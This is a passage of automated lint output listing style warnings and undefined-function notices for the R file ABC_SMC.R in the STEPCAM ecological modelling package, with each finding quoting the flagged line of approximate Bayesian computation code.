^~~~~\n```\n[R/ABC_SMC.R:30:30:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L30) *style:* **Variable and function names should be all lowercase.**\n```r\n​    diff <- params[target] - prevP[target]\n                             ^~~~~\n```\n[R/ABC_SMC.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L37) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:71:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L71) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:75:40:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:83:21:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L83) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:85:46:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:90:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:90:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​  dispVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:91:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:91:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filtVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:92:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  compVals <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:94:13:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L94) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n  ^~~~~~~\n```\n[R/ABC_SMC.R:95:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  RichVec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:96:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  EveVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:97:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  DivVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n  ^~~~~~\n```\n[R/ABC_SMC.R:98:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  OptVec <- 1:numParticles\n              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:100:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:100:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L100) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextDisp <- dispVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:101:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:101:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L101) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextFilt <- filtVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:102:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n  ^~~~~~~~\n```\n[R/ABC_SMC.R:102:15:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L102) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextComp <- compVals\n              ^~~~~~~~\n```\n[R/ABC_SMC.R:104:21:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:3:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n  ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:25:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nextWeights <- rep(1, numParticles)\n                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:113:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L113) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- d[, 1]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:119:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L119) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- d[, 2]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:120:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L120) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- d[, 3]\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:125:11:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:125:31:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L125) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (d[numParticles, 1] == numParticles) {\n                              ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:143:5:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L143) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L144) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:144:28:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L144) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:12:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:29:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L156) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:159:35:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:159:45:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                            ^~~~~~~~\n```\n[R/ABC_SMC.R:159:55:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L159) *style:* **Variable and function names should be all lowercase.**\n```r\n​                                  dispVals, filtVals, compVals)\n                                                      ^~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L160) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L188) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:20:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L188) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:190:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L190) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L195) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/ABC_SMC.R:196:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L196) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n^\n```\n[R/ABC_SMC.R:197:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L197) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:198:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L198) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }\n^\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L200) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L205) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L205) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:14:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L205) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals)\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:27:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] <- params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] <- params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:212:18:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] <- params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:14:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] <- FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] <- FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] <- FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:9:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:218:16:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] <- mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:11:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:23:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:39:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L221) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:223:11:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:23:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:39:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:224:13:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:53:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:224:63:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:225:29:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L228) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:228:14:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:34:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:234:21:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L234) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:234:22:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L234) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:236:13:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:38:](https://github.com/thijsjanzen/STEPCAM/blob/c1b9ce694293fc698308ec85d252428131accd13/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all 